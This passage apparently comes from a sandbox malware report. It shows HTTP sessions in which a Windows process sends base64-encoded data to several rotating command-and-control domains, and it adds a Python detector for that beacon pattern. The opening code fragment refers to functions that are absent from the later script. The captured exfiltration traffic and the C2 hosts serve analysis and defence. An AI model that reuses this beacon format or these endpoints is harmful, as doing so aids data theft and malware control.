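            for (key, ua), g in groups.items() if len(g["hosts"]) >= min_hosts]
```

Key the detection on the cross-host reuse rather than on the literal N0spilI0: the field name and the Vvn value are specific to this sample, while the shape (unescaped base64 as the only form field, a Referer that is the POST target, one stale fixed User-Agent, the same sizes replayed against a rotating host list) is what carries over. A single request to a single host stays below the reporting bar on purpose; flag_campaign only reports a parameter name once it has been seen against min_hosts distinct hosts.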


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
33          192.168.2.4  49770        3.33.130.190    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:38:10.126601934 CEST  757                OUT        POST /2ho9/ HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.consultarfacil.online
                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 47 39 73 50 4c 54 63 62 52 65 43 52 79 6d 37 37 70 51 30 65 33 79 2b 6e 6e 4f 37 5a 6f 75 63 70 42 75 69 68 32 53 36 5a 56 77 4c 32 6a 54 30 6c 65 5a 2b 76 4f 33 37 36 62 6e 44 50 34 77 68 6d 62 4b 32 2f 7a 35 37 4c 44 61 61 79 4a 61 78 62 48 66 67 61 67 76 6d 38 4a 77 61 67 77 55 34 36 67 61 31 73 64 68 63 38 7a 36 62 7a 59 4c 47 39 74 33 6a 41 51 64 56 46 31 6d 44 75 7a 62 4c 72 45 61 71 41 74 6d 4a 64 77 75 4d 39 6e 49 64 6b 33 56 4c 6d 32 36 46 38 79 54 57 36 7a 50 78 75 38 4a 72 62 47 63 48 62 66 54 77 4e 68 4e 59 68 64 45 51 49 2b 67 3d 3d
                                                      Data Ascii: N0spilI0=hbrIhRUnKXpFG9sPLTcbReCRym77pQ0e3y+nnO7ZoucpBuih2S6ZVwL2jT0leZ+vO376bnDP4whmbK2/z57LDaayJaxbHfgagvm8JwagwU46ga1sdhc8z6bzYLG9t3jAQdVF1mDuzbLrEaqAtmJdwuM9nIdk3VLm26F8yTW6zPxu8JrbGcHbfTwNhNYhdEQI+g==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
34          192.168.2.4  49771        3.33.130.190    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:38:12.674756050 CEST  777                OUT        POST /2ho9/ HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.consultarfacil.online
                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 61 77 70 42 50 53 68 6b 54 36 5a 55 77 4c 32 6b 6a 30 6b 42 4a 2b 6d 4f 33 6d 4a 62 6a 4c 50 34 77 31 6d 62 4b 47 2f 7a 71 6a 49 44 4b 61 4b 42 36 78 46 4b 2f 67 61 67 76 6d 38 4a 30 32 47 77 55 77 36 68 71 6c 73 63 46 77 2f 2b 61 62 30 51 72 47 39 6d 58 69 4c 51 64 55 69 31 69 69 44 7a 5a 44 72 45 59 43 41 74 33 4a 53 6e 2b 4d 37 70 6f 63 68 6d 6d 32 6a 35 2f 38 6f 73 69 79 49 74 72 38 4b 39 50 36 42 58 74 6d 4d 4e 54 55 2b 38 4b 52 56 51 48 74 42 6c 68 59 33 2f 2f 2f 62 58 48 79 77 52 67 45 35 75 77 67 35 5a 4e 49 3d
                                                      Data Ascii: N0spilI0=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrawpBPShkT6ZUwL2kj0kBJ+mO3mJbjLP4w1mbKG/zqjIDKaKB6xFK/gagvm8J02GwUw6hqlscFw/+ab0QrG9mXiLQdUi1iiDzZDrEYCAt3JSn+M7pochmm2j5/8osiyItr8K9P6BXtmMNTU+8KRVQHtBlhY3///bXHywRgE5uwg5ZNI=


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      35 | 192.168.2.4 | 49772 | 3.33.130.190 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:15.222847939 CEST | 10859 | OUT | POST /2ho9/ HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.consultarfacil.online
                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 62 6b 70 42 38 61 68 6e 77 53 5a 4f 77 4c 32 72 7a 30 70 42 4a 2f 30 4f 33 2b 57 62 6a 48 31 34 7a 4e 6d 62 72 6d 2f 6e 50 58 49 49 4b 61 4b 65 71 78 59 48 66 67 31 67 72 4c 33 4a 77 57 47 77 55 77 36 68 73 5a 73 49 68 63 2f 38 61 62 7a 59 4c 47 35 74 33 69 6a 51 64 4e 64 31 6a 6a 2b 79 70 6a 72 46 34 53 41 73 46 68 53 6b 65 4d 35 75 6f 63 48 6d 6d 36 6f 35 2f 49 6b 73 69 48 56 74 73 30 4b 39 70 76 57 4d 5a 6e 57 5a 51 77 38 6f 4e 68 79 57 47 46 6c 70 69 63 79 2f 61 6a 69 4a 45 65 55 62 7a 52 4b 74 55 63 52 62 70 70 67 71 50 79 73 31 41 69 4c 34 45 57 71 75 62 64 4c 4d 6a 51 39 4d 50 37 36 51 71 63 61 6b 68 71 71 41 5a 6e 51 63 54 58 79 4f 55 79 78 39 4a 4c 5a 70 52 6a 41 2b 47 75 38 73 41 34 58 74 76 67 46 6c 37 4d 66 47 35 34 61 48 32 49 6b 34 63 51 51 45 38 5a 79 32 59 66 64 35 79 58 77 7a 2b 5a 38 49 30 56 6e 4e 42 51 2b 38 36 38 50 53 4b 4d 37 38 [TRUNCATED]
                                                      Data Ascii: N0spilI0= [TRUNCATED]


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      36 | 192.168.2.4 | 49773 | 3.33.130.190 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:17.768923998 CEST | 479 | OUT | GET /2ho9/?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:38:18.215224981 CEST | 404 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:38:18 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 30 73 70 69 6c 49 30 3d 73 5a 44 6f 69 68 67 38 61 6a 73 46 4e 75 34 72 4a 68 34 61 55 2f 75 31 38 6c 54 30 6a 54 4d 53 78 79 62 4f 73 35 33 63 6f 37 46 6f 43 73 71 75 6c 68 43 4e 49 6c 37 71 6d 78 39 2b 43 70 44 66 4b 69 4c 33 42 52 72 78 33 6b 70 46 53 35 79 2b 74 4c 53 33 43 37 32 72 42 49 41 6e 47 5a 74 6e 6e 2b 58 7a 4a 45 6d 44 67 45 6b 55 34 63 51 6f 66 67 45 46 78 62 4d 3d 26 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P"}</script></head></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      37 | 192.168.2.4 | 49774 | 15.197.204.56 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:23.284563065 CEST | 745 | OUT | POST /8o1o/ HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.broomeorchard.xyz
                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 64 73 50 42 57 52 7a 48 47 58 68 74 44 69 53 50 67 43 76 43 70 6b 35 50 41 55 57 6c 5a 58 4e 54 38 78 43 61 4b 78 33 76 37 6c 44 45 77 52 65 41 68 78 36 2b 41 59 4b 6b 37 58 76 7a 74 42 32 68 46 49 75 55 66 34 49 6f 36 50 6d 61 44 70 5a 49 6c 49 71 34 55 49 30 51 2f 46 30 34 71 4f 31 59 32 4f 4c 69 71 72 63 56 61 79 44 33 4d 6b 62 33 68 4b 45 36 4d 47 51 68 54 45 54 70 6f 4c 55 6f 39 65 39 49 6f 4a 49 46 71 53 45 6b 66 56 4c 48 39 50 4f 76 72 71 6b 49 4e 4e 38 4f 73 44 4b 46 77 46 69 6e 48 6c 49 79 4f 5a 33 5a 57 33 4a 4b 34 37 33 49 4d 49 52 66 47 43 37 58 79 6f 48 43 4a 41 3d 3d
                                                      Data Ascii: N0spilI0=dsPBWRzHGXhtDiSPgCvCpk5PAUWlZXNT8xCaKx3v7lDEwReAhx6+AYKk7XvztB2hFIuUf4Io6PmaDpZIlIq4UI0Q/F04qO1Y2OLiqrcVayD3Mkb3hKE6MGQhTETpoLUo9e9IoJIFqSEkfVLH9POvrqkINN8OsDKFwFinHlIyOZ3ZW3JK473IMIRfGC7XyoHCJA==


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      38 | 192.168.2.4 | 49775 | 15.197.204.56 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:25.831094027 CEST | 765 | OUT | POST /8o1o/ HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.broomeorchard.xyz
                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 33 45 78 30 69 41 6d 30 4f 2b 44 59 4b 6b 7a 33 75 34 6a 68 32 2b 46 49 69 36 66 39 77 6f 36 50 79 61 44 6f 4a 49 6b 37 43 37 57 59 30 57 35 46 30 2b 75 4f 31 59 32 4f 4c 69 71 76 39 43 61 79 4c 33 4d 77 6e 33 68 76 6b 39 42 6d 51 2b 51 45 54 70 73 4c 55 73 39 65 39 36 6f 4e 4a 6f 71 58 41 6b 66 56 37 48 7a 2b 4f 73 79 61 6b 43 44 74 39 41 73 51 33 5a 77 48 61 6e 4a 45 38 31 45 59 32 2b 58 78 59 51 70 4b 57 66 65 49 31 73 62 46 79 6a 2f 72 36 4c 53 41 42 55 72 37 4a 78 51 4c 49 41 67 2f 66 78 69 53 5a 45 79 78 49 3d
                                                      Data Ascii: N0spilI0=dsPBWRzHGXhtBBaPihHChk5IdkWlS3NP8x+aKwCy7W3Ex0iAm0O+DYKkz3u4jh2+FIi6f9wo6PyaDoJIk7C7WY0W5F0+uO1Y2OLiqv9CayL3Mwn3hvk9BmQ+QETpsLUs9e96oNJoqXAkfV7Hz+OsyakCDt9AsQ3ZwHanJE81EY2+XxYQpKWfeI1sbFyj/r6LSABUr7JxQLIAg/fxiSZEyxI=


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      39 | 192.168.2.4 | 49776 | 15.197.204.56 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:28.546482086 CEST | 10847 | OUT | POST /8o1o/ HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.broomeorchard.xyz
                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 76 45 77 47 61 41 6d 54 53 2b 43 59 4b 6b 35 58 75 37 6a 68 32 33 46 49 36 2b 66 39 30 65 36 4a 32 61 41 50 4a 49 78 36 43 37 63 59 30 57 30 6c 30 2f 71 4f 30 46 32 50 37 63 71 72 5a 43 61 79 4c 33 4d 78 33 33 31 71 45 39 44 6d 51 68 54 45 54 75 6f 4c 56 37 39 65 46 51 6f 4e 4d 56 71 44 30 6b 52 56 72 48 78 49 61 73 37 61 6b 45 45 74 38 64 73 51 37 77 77 48 48 63 4a 45 49 54 45 59 43 2b 55 77 70 78 75 72 53 57 63 72 56 64 59 48 43 44 37 61 61 52 56 54 31 33 36 4c 78 51 47 2f 45 30 72 34 75 4e 2b 54 56 52 70 46 50 6d 51 4d 48 6f 38 58 47 4c 44 67 4d 65 2f 6f 2b 62 63 4e 49 63 69 76 5a 53 39 6a 4a 39 46 34 39 46 76 38 74 49 69 38 79 76 38 2b 70 36 48 39 51 54 42 39 78 31 4f 33 47 61 4b 6f 65 6d 79 52 76 48 76 52 43 67 70 58 42 78 50 6e 77 34 72 43 59 50 76 66 65 59 43 31 43 6b 4c 54 72 6b 46 75 34 32 62 30 4b 56 71 5a 4d 49 74 56 4b 33 63 56 77 37 67 [TRUNCATED]
                                                      Data Ascii: N0spilI0= [TRUNCATED]


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      40 | 192.168.2.4 | 49777 | 15.197.204.56 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:31.094681978 CEST | 475 | OUT | GET /8o1o/?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:38:31.546632051 CEST | 404 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:38:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 30 73 70 69 6c 49 30 3d 51 75 6e 68 56 6d 36 6b 5a 46 51 43 4a 6a 47 6a 69 69 37 50 74 56 6c 34 51 42 4f 42 53 45 68 75 6e 53 33 34 43 77 47 4e 79 68 47 34 32 46 2b 55 32 51 71 32 42 62 65 6a 36 48 53 39 6d 68 2b 4d 45 65 4b 46 66 4c 41 6a 38 35 69 79 56 4a 35 43 73 4a 44 6a 57 2f 45 42 30 6c 70 4f 6a 6f 39 46 32 2b 69 4f 74 37 51 66 5a 52 6a 63 4c 79 54 43 69 37 45 75 4c 6d 55 3d 26 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010P"}</script></head></html>


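The sessions above follow one shape on every host the sample rotates through (www.consultarfacil.online, www.broomeorchard.xyz, then www.suarahati20.xyz): a POST to a short alphanumeric path whose only form field, N0spilI0, carries raw base64; a GET to the same path that reuses that field name plus a short trailing parameter (Vvn); Origin and Referer that point at the beacon URL itself although nothing was ever loaded from it; the same Chrome/42 macOS User-Agent and Connection: close on every request. The following Python detector is an added example and is not part of the Joe Sandbox report or of the sample. It parses request text in the form the report prints it, scores those traits per request, and correlates the field name across hosts. The regex bounds, the three-trait threshold, the helper names, the trimmed sample request list and the contrasting benign request are all assumptions constructed for this example, not a vendor signature.

```python
"""Beacon-pattern detector for the HTTP sessions printed above (added example)."""
import re
from collections import defaultdict

# User-Agent sent unchanged on every request in the sessions above.
BEACON_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36")
FIELD_RE = re.compile(r"[A-Za-z0-9]{6,12}")        # field name such as N0spilI0 (bound assumed)
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")    # raw base64, not percent-encoded
PATH_RE = re.compile(r"/[A-Za-z0-9]{3,6}/")         # /2ho9/, /8o1o/, /4est/ (bound assumed)


def parse_request(raw):
    """Split request text into method, path, query string, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}


def split_form(data):
    """k=v&k=v splitter that keeps '+' and '/' intact; urllib.parse.parse_qsl
    would turn the '+' inside the raw base64 into a space."""
    pairs = []
    for part in data.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def beacon_traits(req):
    """Return the beacon traits a single request exhibits."""
    traits = []
    h = req["headers"]
    host = h.get("host", "")
    if PATH_RE.fullmatch(req["path"]):
        traits.append("short alphanumeric path")
    if req["method"] == "POST":
        pairs = split_form(req["body"])
        if len(pairs) == 1 and FIELD_RE.fullmatch(pairs[0][0]) and B64_RE.fullmatch(pairs[0][1]):
            traits.append("single-field base64 POST body")
    elif req["method"] == "GET":
        pairs = split_form(req["query"])
        if len(pairs) == 2 and FIELD_RE.fullmatch(pairs[0][0]) and B64_RE.fullmatch(pairs[0][1]):
            traits.append("base64 GET parameter plus one short trailing parameter")
    # Origin and Referer name the beacon URL itself; no page was ever fetched from it.
    if host and h.get("origin", "").endswith("//" + host) \
            and h.get("referer", "").startswith("http://" + host + req["path"]):
        traits.append("self-referential Origin/Referer")
    if h.get("user-agent") == BEACON_UA:
        traits.append("fixed Chrome/42 macOS User-Agent")
    if h.get("connection", "").lower() == "close":
        traits.append("Connection: close")
    return traits


def field_name(req):
    """First form/query field name, used to correlate beacons across hosts."""
    pairs = split_form(req["body"] if req["method"] == "POST" else req["query"])
    return pairs[0][0] if pairs else None


def analyse(raw_requests, min_traits=3):
    """Flag requests showing at least min_traits traits and report field names
    reused against more than one host, which is how the domain rotation above shows up."""
    hits, hosts_per_field = [], defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        traits = beacon_traits(req)
        if len(traits) >= min_traits:
            hits.append((req["headers"].get("host"), req["method"], req["path"], traits))
            hosts_per_field[field_name(req)].add(req["headers"].get("host"))
    rotated = {k: sorted(v) for k, v in hosts_per_field.items() if len(v) >= 2}
    return hits, rotated


def _req(lines, body=""):
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed sample: sessions 34, 36 and 37 above with headers trimmed, plus one
# ordinary browser request (www.example.com, invented) for contrast.
SAMPLE_REQUESTS = [
    _req(["POST /2ho9/ HTTP/1.1", "Host: www.consultarfacil.online",
          "Content-Type: application/x-www-form-urlencoded", "Connection: close",
          "Origin: http://www.consultarfacil.online",
          "Referer: http://www.consultarfacil.online/2ho9/", "User-Agent: " + BEACON_UA],
         "N0spilI0=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrawpBPShkT6ZUwL2kj0kBJ+mO3mJbjLP4w1mbKG/zqjIDKaKB6xFK/gagvm8J02GwUw6hqlscFw/+ab0QrG9mXiLQdUi1iiDzZDrEYCAt3JSn+M7pochmm2j5/8osiyItr8K9P6BXtmMNTU+8KRVQHtBlhY3///bXHywRgE5uwg5ZNI="),
    _req(["GET /2ho9/?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P HTTP/1.1",
          "Host: www.consultarfacil.online", "Connection: close", "User-Agent: " + BEACON_UA]),
    _req(["POST /8o1o/ HTTP/1.1", "Host: www.broomeorchard.xyz",
          "Content-Type: application/x-www-form-urlencoded", "Connection: close",
          "Origin: http://www.broomeorchard.xyz", "Referer: http://www.broomeorchard.xyz/8o1o/",
          "User-Agent: " + BEACON_UA],
         "N0spilI0=dsPBWRzHGXhtDiSPgCvCpk5PAUWlZXNT8xCaKx3v7lDEwReAhx6+AYKk7XvztB2hFIuUf4Io6PmaDpZIlIq4UI0Q/F04qO1Y2OLiqrcVayD3Mkb3hKE6MGQhTETpoLUo9e9IoJIFqSEkfVLH9POvrqkINN8OsDKFwFinHlIyOZ3ZW3JK473IMIRfGC7XyoHCJA=="),
    _req(["GET /index.html HTTP/1.1", "Host: www.example.com", "Connection: keep-alive",
          "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/130.0"]),
]

if __name__ == "__main__":
    hits, rotated = analyse(SAMPLE_REQUESTS)
    for hit in hits:
        print(hit)
    print(rotated)
```

The per-request traits alone are weak on their own (plenty of legitimate sites use Connection: close or an old User-Agent), which is why the script only reports a request once several coincide and why the cross-host correlation on the field name is the strongest signal: a genuine web form does not send the same oddly named field to three unrelated domains within thirty seconds. On live traffic the same logic would run over proxy or Zeek http.log records rather than the inline strings used here.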
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      41 | 192.168.2.4 | 49778 | 198.252.106.191 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:37.135612011 CEST | 739 | OUT | POST /4est/ HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.suarahati20.xyz
                                                      Referer: http://www.suarahati20.xyz/4est/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 52 65 44 38 59 31 44 58 33 63 41 4e 48 6a 51 77 76 44 73 58 58 77 4f 48 4b 68 50 64 42 36 54 61 51 6b 4b 64 70 67 61 63 32 65 72 7a 44 47 43 53 4a 59 54 4a 59 4e 4e 31 6c 4b 31 63 45 6c 46 53 44 32 78 6f 54 4f 4a 54 6c 71 73 33 45 31 33 39 75 35 64 70 35 65 6c 6f 59 41 58 6b 76 33 6e 63 34 6f 75 4b 45 74 52 36 56 2b 4b 61 72 36 32 31 2f 46 4e 6b 4d 45 79 30 58 69 54 71 79 4e 6a 64 47 31 6a 64 70 65 4b 39 72 6f 6c 73 47 4b 32 62 67 37 65 59 69 2f 4b 75 62 73 61 4b 78 79 36 42 38 55 74 4b 57 77 6d 65 6e 37 4d 44 62 30 51 4f 37 50 52 54 7a 77 3d 3d
